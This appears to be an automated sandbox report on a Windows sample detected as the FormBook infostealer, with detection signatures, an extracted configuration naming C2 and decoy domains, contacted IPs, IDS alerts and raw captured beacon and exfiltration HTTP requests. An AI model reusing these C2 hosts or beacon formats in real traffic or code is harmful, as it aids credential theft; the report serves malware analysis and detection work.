Windows Analysis Report
TR0627729920002.exe

Overview

General Information

Sample Name: TR0627729920002.exe
Analysis ID: 680563
MD5: 8dbfe68662123710d83fef939287d9a3
SHA1: 9481ef5498dd490e4efe83601f916ee48f61e649
SHA256: 663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: TR0627729920002.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.trisuaka.xyz/uj3c/ Avira URL Cloud: Label: malware
Source: http://www.nomaxdic.com/uj3c/ Avira URL Cloud: Label: malware
Source: www.nutricognition.com/uj3c/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: kidsfundoor.com Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe ReversingLabs: Detection: 29%
Machine Learning detection for sample
Source: TR0627729920002.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.cmd.exe.50410000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TR0627729920002.exe.2162de8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.cmd.exe.50410000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

Exploits
barindex
Yara detected UAC Bypass using ComputerDefaults
Source: Yara match File source: 0.2.TR0627729920002.exe.2162de8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TR0627729920002.exe.2162de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Jwjxmakrv.exe PID: 5912, type: MEMORYSTR
Uses 32bit PE files
Source: TR0627729920002.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.gografic.com
Source: C:\Windows\explorer.exe Network Connect: 154.55.180.56 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.moneytaoism.com
Source: C:\Windows\explorer.exe Domain query: www.naturathome.info
Source: C:\Windows\explorer.exe Domain query: www.6111.site
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.187 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 38.54.163.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kidsfundoor.com
Source: C:\Windows\explorer.exe Domain query: www.choonchain.com
Source: C:\Windows\explorer.exe Domain query: www.empireapothecary.com
Source: C:\Windows\explorer.exe Domain query: www.huangse5.com
Source: C:\Windows\explorer.exe Domain query: www.nutricognition.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.218 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.trisuaka.xyz
Source: C:\Windows\explorer.exe Domain query: www.trendiddas.com
Source: C:\Windows\explorer.exe Domain query: www.nomaxdic.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 156.226.60.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.designgamagazine.com
Source: C:\Windows\explorer.exe Domain query: www.shopwithtrooperdavecom.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.trisuaka.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.nutricognition.com/uj3c/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 81.169.145.158 81.169.145.158
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 35 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30 67 68 53 31 78 6c 33 7a 4e 73 39 65 4c 57 59 6a 77 6b 47 46 33 70 35 67 66 56 4a 69 74 66 36 6a 7a 66 4b 50 6c 70 4d 57 48 31 4b 66 46 70 50 50 73 32 31 41 59 47 41 4f 73 4a 34 6d 58 33 6b 48 51 69 6a 74 41 45 70 53 4f 4c 71 75 69 64 35 56 31 41 62 4e 68 58 53 6e 5f 32 68 39 49 47 51 39 75 46 41 44 39 38 71 4b 70 79 62 5a 4e 30 35 4a 59 4e 31 38 4f 4b 61 4a 68 35 74 45 6e 44 35 6d 57 44 6c 49 66 79 58 33 57 71 41 44 52 43 76 67 6f 41 55 73 69 6e 6a 4f 31 4c 43 75 55 53 5a 65 77 6e 48 44 6c 6e 75 4c 74 32 4f 4c 39 47 30 6e 63 58 42 67 5f 57 34 66 33 76 39 45 34 69 33 57 62 65 59 55 64 50 6c 48 53 6e 72 6c 72 34 4e 45 47 76 4d 44 5f 53 69 5a 79 71 75 62 5f 61 6f 49 74 4b 56 6d 76 5a 65 78 74 6e 42 38 61 6a 30 6c 64 52 38 36 48 42 6a 39 48 6e 38 4b 59 42 2d 4c 77 65 78 79 68 32 50 32 58 6e 52 35 61 66 64 55 4b 33 41 64 50 72 2d 4e 74 7e 67 54 30 4d 30 79 68 48 6e 71 4b 4f 67 74 62 68 76 48 42 4b 4e 5a 77 63 47 78 2d 4f 71 4f 6e 72 35 58 6b 48 34 45 35 4b 51 59 4d 36 2d 7e 5f 52 79 35 54 74 6f 74 6e 6d 71 6c 45 51 67 34 4a
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 